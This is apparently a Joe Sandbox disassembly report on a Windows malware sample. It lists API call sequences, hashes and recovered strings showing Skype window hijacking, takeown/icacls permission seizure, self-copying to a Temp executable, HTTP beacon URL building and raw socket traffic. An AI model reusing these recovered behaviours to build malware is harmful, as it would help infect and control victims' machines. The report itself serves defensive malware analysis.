                                                                                                                                                                                                                                                      • API ID: Window$Cursor$Focus$CountForegroundTick$SleepVisible$ClassInputNameProcessRectSendShowThread
                                                                                                                                                                                                                                                      • String ID: TCommunicatorForm.$tSkMainForm.
                                                                                                                                                                                                                                                      • API String ID: 2712077931-3065349318
                                                                                                                                                                                                                                                      • Opcode ID: 017ed899241fdeb08b60c5f34f16ee895284aff57d3c9725eceff3085ae614bf
                                                                                                                                                                                                                                                      • Instruction ID: 7b726061328220649099ec34847a84877283f267fc68fae1db7158865fd20614
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 017ed899241fdeb08b60c5f34f16ee895284aff57d3c9725eceff3085ae614bf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA810371940208BBDF219BA0DC85FDF7F79EF04304F404096F905A22A2D7799A96CBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,76AF0440,?,00416BE9,?,?,?), ref: 00416642
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00416BE9,?,?), ref: 0041667E
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004166A5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$wsprintf
                                                                                                                                                                                                                                                      • String ID: %s%s:%s:%d$</service>$<serviceType>%s</serviceType>$GET %s HTTP/1.1HOST: %sACCEPT-LANGUAGE: en$URLBase$controlURL$friendlyName$http://%s/$modelName
                                                                                                                                                                                                                                                      • API String ID: 1220175532-320095921
                                                                                                                                                                                                                                                      • Opcode ID: a14fee9dd5f62a11f8f1d76a127600e44c560fd122f20b70fef70dd4d47d74d4
                                                                                                                                                                                                                                                      • Instruction ID: 616d92ada8dbdb85c4e2a9650ac82afae0139046dc8987e1b6d74a61cc5f750b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a14fee9dd5f62a11f8f1d76a127600e44c560fd122f20b70fef70dd4d47d74d4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 266130B6D00118ABDB11EB94DD45EDE77BCAB08304F4144A7AA09E3041EB78DBD9CF69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000002), ref: 00405D85
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00405D93
                                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00000080), ref: 00405DAD
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00405DBF
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405DF9
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00405E04
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000001,00000001,00000080), ref: 00405E15
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00405E1C
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000020), ref: 00405E43
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00405E67
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405EC6
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00405ED1
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405ED5
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00405EE0
                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00405EE4
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000001,00000001,00000080), ref: 00405EF9
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00405F00
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405F59
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00405F37
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00405F4E
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00405F51
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$MessagePost$Show$Destroy$ProcessThreadlstrlen$ClassEnableNameSleepTextVisible
                                                                                                                                                                                                                                                      • String ID: - $skype$tooltips_class32$twitter
                                                                                                                                                                                                                                                      • API String ID: 968148897-3706606202
                                                                                                                                                                                                                                                      • Opcode ID: 3976e576093891d2386c3fc19554f5d567771aff1a74ec8261fc56ca94719168
                                                                                                                                                                                                                                                      • Instruction ID: 54639c6e0f4210a215bb2e5edd6b10eb1cc48d076ecbf56d7b59a4990fe04e6e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3976e576093891d2386c3fc19554f5d567771aff1a74ec8261fc56ca94719168
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A151C1B1209705BFE620EF60EC89EAB379CEB05345F50043AF641912D1DB799E468B7E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000080), ref: 0041C68A
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0041C6A8
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0041C6D1
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041C6DE
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041C6E5
                                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,0042A440), ref: 0041C6ED
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,000000FF,?,?,?,?,00000040), ref: 0041C712
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 0041C758
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0041C760
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Rectlstrlen$ClassDesktopMessageNamePostShowTextVisible
                                                                                                                                                                                                                                                      • String ID: tSkACLForm.$tSkMainForm.$tSkNotify
                                                                                                                                                                                                                                                      • API String ID: 3986333915-155394806
                                                                                                                                                                                                                                                      • Opcode ID: d809c220127ab04c6e26cd707719160ad7a6ce2147e81f535c59c85863e19db1
                                                                                                                                                                                                                                                      • Instruction ID: 4ca3ed5e47817913f35c8832715780e6f4b1c516ac5aeb0efc9290197966c096
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d809c220127ab04c6e26cd707719160ad7a6ce2147e81f535c59c85863e19db1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0141E4B2A44315BBD730A7B19D89F9B3F6CEB08720F101556FA12E21C2CA78E450CA7D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,0000001E,?,?,?), ref: 00402FB3
                                                                                                                                                                                                                                                        • Part of subcall function 00413868: GetTickCount.KERNEL32 ref: 00413883
                                                                                                                                                                                                                                                        • Part of subcall function 004135C8: lstrlenA.KERNEL32(0040C523,?,?,00000000), ref: 004135F4
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000000,?,0000001E,?,?,?), ref: 00402FC3
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,0000001E,?,?,?), ref: 00402FD3
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,0000003E,?,?,?), ref: 00402FE3
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040303E
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?), ref: 00403055
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?), ref: 0040309C
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,http://,?,?,?), ref: 0040315B
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,:%d,00000050,?,?,?), ref: 0040318A
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040318F
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,/%s,?,?,?,?), ref: 004031A4
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004031A9
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,/%s,00000000,?,?,?), ref: 004031BE
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004031C3
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,/%s,?,?,?,?), ref: 004031D8
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004031DD
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?i=%s&l=%s&t=%s,?,?,?,?,?,?), ref: 004031F4
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004031F9
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004031FF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$wsprintf$lstrcpyn$CountTick$lstrcpy
                                                                                                                                                                                                                                                      • String ID: /%s$:%d$?i=%s&l=%s&t=%s$http://$null
                                                                                                                                                                                                                                                      • API String ID: 4185424064-1823269905
                                                                                                                                                                                                                                                      • Opcode ID: aba95a1e2762d2d02715140dc1ca3af52ab43fc2b6df50f2811dc7ee30781597
                                                                                                                                                                                                                                                      • Instruction ID: 72dd0d13ca70cfdff163accb205508d9fedcb1d1d3dab536917e016eec2f988d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aba95a1e2762d2d02715140dc1ca3af52ab43fc2b6df50f2811dc7ee30781597
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4A1E572904288AADF11EFA4DC45ADE3F9C9F05318F54443BF914AA2C2D77CDA058B6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 0040838E
                                                                                                                                                                                                                                                        • Part of subcall function 00414510: lstrlenA.KERNEL32(0040D67B,00000000,0040D67B,00000000), ref: 00414516
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004083B8
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,takeown,?,00000000,00000000), ref: 004083CD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 004083D8
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004083F2
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,icacls,?,00000000,00000000), ref: 00408407
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 00408412
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00408425
                                                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408492
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000001), ref: 004084A6
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004084FE
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 00408530
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000001), ref: 0040853A
                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(0000007F,?,00000001), ref: 00408553
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00408565
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00408583
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(0000007F,00000080), ref: 00408592
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(0000007F), ref: 00408595
                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,0000007F,00000000), ref: 004085A6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$lstrcat$Sleep$AttributesCopyExecuteNameShelllstrlenwsprintf$ComputerDeleteUser
                                                                                                                                                                                                                                                      • String ID: %s /grant %s:D$/f %s$C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe$icacls$takeown
                                                                                                                                                                                                                                                      • API String ID: 887666959-343965072
                                                                                                                                                                                                                                                      • Opcode ID: f0c35e02ed1229f2405299b24346018c684d3f83add17e5ea9127f7430e31fad
                                                                                                                                                                                                                                                      • Instruction ID: 3939c6074a173fcdfa0f14eb7da2ef2ef8448beaebc060f0d5e405bee58feb71
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0c35e02ed1229f2405299b24346018c684d3f83add17e5ea9127f7430e31fad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA71A272944218BFDF109BA4DC49EEE7B7CEF45704F0400AAF949A3191DF389A858F69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0040EB47: lstrcpyA.KERNEL32(00000027,0042A7D4,?,76AE83C0,00000000,00000000,?,?,00500000,?,00000027), ref: 0040EB66
                                                                                                                                                                                                                                                        • Part of subcall function 0040EB47: lstrlenA.KERNEL32(00000000), ref: 0040EB8A
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040F16C
                                                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 0040F18E
                                                                                                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 0040F1A1
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040F1F7
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 0040F20A
                                                                                                                                                                                                                                                      • send.WS2_32(?,?,00000000), ref: 0040F21B
                                                                                                                                                                                                                                                      • select.WS2_32(?,00000001,00000000,00000000,?), ref: 0040F254
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(?,00000001), ref: 0040F262
                                                                                                                                                                                                                                                      • recv.WS2_32(?,?,00000001,00000000), ref: 0040F27C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$connecthtonslstrcpyrecvselectsendsocketwsprintf
                                                                                                                                                                                                                                                      • String ID: 0$chunked$content-length$transfer-encoding
                                                                                                                                                                                                                                                      • API String ID: 1838493728-40983872
                                                                                                                                                                                                                                                      • Opcode ID: 9201bdf8cc6a7f0593ba6ec369a208587268ce31896436264240754d634d7038
                                                                                                                                                                                                                                                      • Instruction ID: 40cfbdb6b8a0f10b890aa6bab67d98a43da17613289cd9da5c7ab6e3ab63f530
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9201bdf8cc6a7f0593ba6ec369a208587268ce31896436264240754d634d7038
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEB18A71500208AFEF21DF64DC44BEA77A9FB04704F5040BAF905E6192DB79AA89CF65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000080), ref: 0041C4E3
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0041C501
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0041C52A
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041C537
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041C53E
                                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,0042A440), ref: 0041C546
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,000000FF,?,?,?,?,00000040), ref: 0041C56B
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 0041C5AD
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0041C5B5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Rectlstrlen$ClassDesktopMessageNamePostShowTextVisible
                                                                                                                                                                                                                                                      • String ID: tSkACLForm.$tSkMainForm.$tSkNotify
                                                                                                                                                                                                                                                      • API String ID: 3986333915-155394806
                                                                                                                                                                                                                                                      • Opcode ID: c14a4ee13b1a314e44961800a36f915c8e729132134e97eb4ac3e4cf8d7f5564
                                                                                                                                                                                                                                                      • Instruction ID: f1947c54833e8a5c071f9f869f208415e8984487400319f91f78b484a6a3a814
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c14a4ee13b1a314e44961800a36f915c8e729132134e97eb4ac3e4cf8d7f5564
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA41B6B2A44314BBD730ABB59D89F9F3F6CEB08724F541556FA02A21C1CA7CE450CA79
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000001,FAILUREREASON,?,?,00000000,0045B918,0041F049,0045B925), ref: 0041DED9
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000001,REMOTELY_CANCELLED,?,00000000,0045B918,0041F049,0045B925), ref: 0041DEE9
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000001,REMOTE_DOES_NOT_SUPPORT_FT,?,00000000,0045B918,0041F049,0045B925), ref: 0041DEFE
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000001,FILEPATH,?,00000000,0045B918,0041F049,0045B925), ref: 0041DFC2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
